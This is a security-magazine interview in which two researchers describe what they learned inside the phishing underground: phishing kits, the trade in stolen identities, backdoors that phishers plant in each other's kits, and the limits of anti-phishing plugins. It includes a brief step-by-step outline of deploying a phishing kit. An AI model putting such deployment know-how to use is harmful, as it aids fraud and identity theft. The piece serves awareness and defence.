Interview with Nitesh Dhanjani and Billy Rios, Spies in the Phishing Underground

Have you read the latest issue of our digital (IN)SECURE Magazine? If not, do it now.

Both Nitesh and Billy are well-known security researchers that have recently managed to infiltrate the phishing underground. What started as a simple examination of phishing sites, turned into an extraordinary view of the ecosystem that supports the phishing effort that plagues modern day financial institutions and their customers.

They saw an extraordinary amount of sensitive customer account information, obtained the latest phishing kits, located and examined the tools used by phishers, trolled sites buying and selling identities, and even social engineered a few scammers.

In this interview, they expose the tactics and tools that phishers use, illustrate what happens when your confidential information gets stolen, discuss how phishers communicate and even how they phish each other.

What are phishing kits and how are they distributed?

Dhanjani: A phishing kit is the most important tool in a phisher’s arsenal. Think of a popular company that executes financial transactions on the web. All the source code and static content such as images and logos needed to setup a phishing site for the company you just thought of is most likely to be present in a phishing kit. Let us suppose you get hold of such a kit and you want to deploy a phishing site. All you would have to do is the following: 1) Unzip the kit 2) Pick the directory corresponding the company you want to target 3) Edit a single file in the directory to input the email address you want the results emailed to 4) Deploy the directory onto a compromised host on the internet, and voila! – you have yourself a phishing site. If you take a look at the client side code (HTML and JavaScript) presented to your browser on a phishing site that targets a particular company, you will notice that other phishing sites that target the same company have similar characteristics. This is because, more often than not, the sites are deployed using popular phishing kits. The code within the kits is quite simple, mostly consisting of a web form that does the dirty work, along with image files and static content. The kits are often distributed amongst the phisher communities on message boards, and at times sold or traded for money or identities.

Rios: Phishing kits are the tip of the iceberg, they are the piece of the phishing eco system that everyone sees and knows about. The typical phishing kit consists of the HTML that makes up the forged site that the user sees and the backend logic that used to steal the victims information. Most phishing kits are probably created by a small number of individuals and typically sold on phishing forums. Although the various kits have different front ends and HTML content, the back end logic is surprisingly similar for most of the kits we’ve seen. These kits are used over and over again and most of the phishing sites you’ve seen are probably a variant of small set of phishing kits. Many think that phishing sites are all custom jobs that a particular phisher has developed and deployed. The reality is pre-made, ready-to-deploy, turnkey sites are already created for practically every major organization that you can think of. All a phisher has to do is purchase the latest kit and deploy, no technical expertise or coding skills are really required. All the phisher typically has to do is place their email address into one line of code and they have a ready to deploy phishing site.

Many have become victims of phishing and we see the attackers using new methods all the time. In your opinion, what is their skill level? Who are we dealing with?
Dhanjani: This is an important question, and I’m glad you asked it. When we think of phishers, we often guess that they are a group of highly skilled ninja hackers. They have collectively caused billions of dollars in losses, and ruined the lives of many citizens whose identities they have stolen and abused. These people have got to be pretty smart, right? Wrong. Just think about what a typical phisher is really doing: installing pre-coded websites on compromised servers – that hardly takes any skill and it shouldn’t impress anyone. Then you have cases where phishers steal information from other phishers by planting backdoors in the phishing kits in the form of elementary obfuscation of scripting code. In other words, phishers are not able to pull of their attacks because they are highly skilled, but because the are abusing a few fundamental flaws such as lack of awareness, lack of standards around browser UI that clearly highlights high assurance websites, and our dependence on static identifiers such as SSN, Credit Card numbers, etc to establish identifies and commit financial transactions. I’ll expand my views on the static identifier problem in my answer to the last question.

Rios: This is one of the more surprising aspects of the research we (Nitesh and I) conducted. I had always thought that most phishers were clever hackers evading authorities using the latest evasion techniques and tools. The reality of the matter is most of the phishers we tracked were sloppy and unsophisticated. The tools they used were rarely created by the phisher deploying the actual scam, and for the most part it seemed the phisher merely downloaded kits and tools from some place and reused over and over and over again. It also seemed that many phishers don’t even really understand how the phishing kits they’ve deployed work! We also came across many phishing kits and tools that had simple backdoors written into the source code (essentially, phishers phishing phishers). These backdoors are easily spotted by anyone who has even a basic idea of how the source code flow worked, yet was undetected by many phishers. Maybe a few phishers out there are skilled, but the majority are clueless.

During your research, how did you track phishers? What are their most common information trade networks?
Dhanjani: I clearly remember how we stumbled upon this information. We happened to be studying a simple server side script from a phishing kit. The script was part of a ready made site for a popular bank. All the script did was to take the information submitted by the victim an email it to the phisher at a particular email address. We noticed that the script put some static text in the subject line of the outgoing email in order to help the phisher identify the emails. We decided to Google for that particular string. The results completely stunned us. Social Security numbers, bank account numbers, dates of birth, ATM PINs, addresses, credentials to online banking accounts, all out in the open, a lot of which was collected from victims only a few hours ago. A simple Google search led us to a whole new world where phishers were trading this information in different languages around the world. This sort of exposure can ruin people’s lives – yet it was right there, out in the open. It was quite unnerving.

Rios: Even phishers need to communicate! Many think that phishers are lone individuals who are anti-social sitting in a dark basement in some dark corner of the world. The reality is there are entire social networks dedicated to helping phishers communicate details on new scams, phishing kits, and to buy and sell identities. Many of these conversations occur on publicly accessible forums and websites, but the difficult part is knowing where to find these forums and sites. As everyone knows, search engines are great at crawling the most obscure sites on the Internet. Once we had an opportunity to see the source code of a few kits, we could key off of some key signatures, which resulted in our favorite searching engine leading us to forums where phishing scams were being discussed and web sites where identities were being bought and sold. Once we had access to these forums, we now have another set of key signatures (phisher aliases, handlers, more phishing kits, jargon, etc) to find even more forums and sites, which basically lead us into what seems like a never ending spiral of phishing and ID theft forums and sites.

Let’s say your identity gets stolen, what happens next? How exactly does a phisher benefit from gaining access to your sensitive information? What can he do?
Dhanjani: As soon as your identity is stolen, it becomes currency for the phishers. Phishers often trade identities with each other, and sell them. Some of the more “charitable” phishers publish the identities on message boards to share with the community. Once a malicious entity has obtained your identity, he or she can open credit lines in your name, in addition to obtaining loans and executing financial transactions on your behalf. It doesn’t stop there, a stolen identity can also be abused to obtain legal identity cards with your name on it, thereby cloning your identity. This is often used by people who want to avoid arrest (the irony!), or establish a brand new identity to live on. Unfortunately, it takes a lot of legal effort on part of the victims to repair the damages caused to their lives due to identity theft.

Rios: In my opinion, this was the most interesting portion of our research. Many see phishing as merely forged websites with familiar logos. In reality, there is an entire ecosystem supporting phishers and their scams. Hackers compromise servers and turn-key backdoors are placed on these compromised servers. Before phishing site can be deployed, phishers buy or trade access to compromised systems. Once the phisher gains access to a compromised machine, they deploy their readymade kits. A single server is typically used to serve many different scams/phishing sites simultaneously. Once an unsuspecting user is lured to a phishing site and enters their information into the forged site, it kicks off a series of events that ultimately lead to very bad things for the victim. Typically, the information entered into phishing site is emailed to an anonymous email account (we?­ve seen other methods, but this is the most popular). From here, the phisher visits several places, advertising that they have identity information for sale. These identities are purchased by other individuals who then visit sites dedicated to creating fake credit cards and ID theft. The stolen information changes hands several times to all sorts of different characters and then the vicious cycle repeats itself.

You research shows that even phishing sites have backdoors which means that phishers are trying to phish other phishers. Give us some details.
Dhanjani: Indeed. This goes back to the previous point I made about phishers being less sophisticated than people think. We came across backdoors in phishing kits that were simple code obfuscations that caused the script to send the victim’s information to the kit’s author (backdoor) in addition to the phisher installing the kit. We found deployed versions of the kits that clearly indicated confusion on part of the phisher who deployed the site: some phishers commented out portions of the code, while some seemed to edit the script around where the backdoor code was present indicating suspicion. Many phishers never realized the backdoor code was present.

Rios: The number of backdoors we saw was staggering. The servers serving the phishing sites had backdoors, the code used in the phishing kits had backdoors, the tools used by phishers had backdoors. Phishers aren’t afraid to steal from regulars people and they are also not afraid to steal from other phishers. Some of the backdoors were meant to keep control over a compromised server, while other simply stole information that had been stolen by other phishers! We came across several forums where phishers, scammers, and carders basically identified other phishers, scammers, and carders that had scammed them. These shady characters may work with each other but they sure don’t trust each other, that’s for sure.

There are many anti-phishing plugins available for browsers. Are they really all the protection we need?
Dhanjani: The anti-phishing plugins are extremely useful and I sincerely appreciate their efforts. However, it is extremely important to realize that the anti-phishing plugins are a band-aid to underlying problems that must be addressed if we want to come close to solving the phishing problem. We need to do a better job with respect to user awareness, but we must to be careful not to expect too much from the average user. We cannot expect the average user to be able to analyze a URL to ensure it is legitimate. Instead we need to come up with browser UI standards that allow the users to clearly and easily distinguish high assurance domains and websites. Most importantly, we need to realize the actual problem at hand: the reliance on static identifiers to establish and maintain identities and execute financial transactions. I will expand on this in the following question.

I’d also like to add that phishers are likely to abuse the blacklists published for these plugins for their own benefit. The blacklists are a list of known phishing sites that the plugins consume in order to identify what websites are fraudulent. These blacklists therefore contain IP addresses and host names of servers hosting phishing sites. Since phishing sites are commonly installed on servers that have been compromised, and phishers don’t bother to patch systems they have installed their kits on, this list translates to a ‘list of easily compromisable hosts’ for other phishers. This situation can lead to multiple phishers obtaining access to the same host after the first one has broken in. However, I think the benefits of anti-phishing plugins outweigh this negative side-effect.

What is, currently, the magnitude of the phishing threat? What can we expect during this year?
Dhanjani: I think the phishing problem is going to continue to grow, and continue to cost us billions of dollars this year and even more so every year moving forward. We can expect the phishers to continue to use similar techniques for a while to come. But what do we do to solve this problem? Well, we can apply as many temporary band-aid solutions we want, such as host intrusion prevention systems, browser plugins, and we can perform penetration tests on our servers and applications all we want, but these solutions alone are not enough to even come close to solving the actual problem. We are not going to win the arms race with the phishers unless we admit to the underlying problem at hand: the reliance on static identifiers to establish identities and execute financial transactions. Let me expand on this a bit. We take care not to blurt out our SSN to anyone on the street, yet it is likely to be stored on hundreds of corporate databases as we progress in our lives. We take care not to expose our Credit Card numbers, but we must hand them over to people we don’t know at retail stores if we want to use it. We aren’t going to solve the problem of online PII (Personally Identifiable Information) and identify theft just by writing even more secure code (although it certainly helps), or by continuing to play whack-a-mole with phishers. The system of relying on static identifiers to commit financial transactions needs to be rethought.

Commercial financial institutions such as credit card companies and banks realize that the cost of implementing a new system that does not merely rely on static identifiers is higher than the fraud committed, so they decide to accept the cost. This is the reason why the system has not changed. Unfortunately, financial institutions only take into account their cost when making this decision, but it also ends up affecting the lives of millions of people who have to pay with their identities when such fraud is committed (this cost is also shared by other companies that want to have the capacity to process transactions. The PCI standard is a good example of this situation).

For the next few years, we are going to continue to apply band-aids around the problem of data leakage, and continue to play whack-a-mole with the phishers without solving the actual problem at hand. In order to make any significant progress, we must come up with a brand new system that does away with depending on static identifiers. We will know we’ve accomplished this when we will be able to publish our credit reports publicly without fearing for our identities.